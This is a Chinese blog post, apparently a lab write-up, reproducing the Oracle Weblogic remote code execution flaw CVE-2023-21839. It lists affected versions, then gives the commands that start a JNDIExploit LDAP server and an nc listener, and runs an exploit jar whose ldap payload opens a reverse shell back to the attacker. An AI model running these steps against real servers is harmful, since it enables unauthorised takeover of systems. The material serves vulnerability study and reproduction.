Weblogic远程代码执行漏洞(CVE-2023-21839)

Weblogic远程代码执行漏洞(CVE-2023-21839)

0x00 漏洞环境

  • 攻击机:192.168.75.211
  • 目标机:目标ip
  • 影响版本:Oracle WebLogic Server 10.3.6.0

0x01 漏洞介绍

  • CVE-2023-21839是Weblogic产品中的远程代码执行漏洞,由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功可能会导致Oracle Weblogic服务器被控制,远程注入操作系统命令或代码。

0x02 影响版本

  • Oracle WebLogic Server 12.2.1.2.0
  • Oracle WebLogic Server 12.2.1.1.0
  • Oracle WebLogic Server 12.2.1.3.0
  • Oracle WebLogic Server 12.2.1.0.0
  • Oracle WebLogic Server 12.2.1.4.0
  • Oracle WebLogic Server 14.1.1.0.0
  • Oracle WebLogic Server 12.1.2.0.0
  • Oracle WebLogic Server 12.1.3.0.0
  • Oracle WebLogic Server 10.3.6.0

0x03 漏洞原理

  1. WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过rmi/ldap远程协议进行远程命令执行。从而拿shell。

0x04 漏洞复现

  1. 访问http://目标ip:7001/console,进入网站主页,发现其版本为10.3.6.0,存在CVE-2023-21839漏洞。

在这里插入图片描述

  1. 打开kali尝试攻击,首先开启ldap服务。
    JNDIExploit-1.4-SNAPSHOT.jar下载

    java -jar JNDIExploit-1.4-SNAPSHOT.jar --ip 攻击机IP
    

  2. 启动监听,为反弹shell做好准备。

    nc -lvnp 6666
    

  3. 使用CVE-2023-21839工具来进行攻击测试。
    Weblogic-CVE-2023-21839.jar下载网址

    java -jar Weblogic-CVE-2023-21839.jar 目标机IP:7001 ldap://攻击机IP:1389/Basic/ReverseShell/攻击机IP/6666
    

  4. 此时再去看监听页面,发现反弹shell成功。

  • 12
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值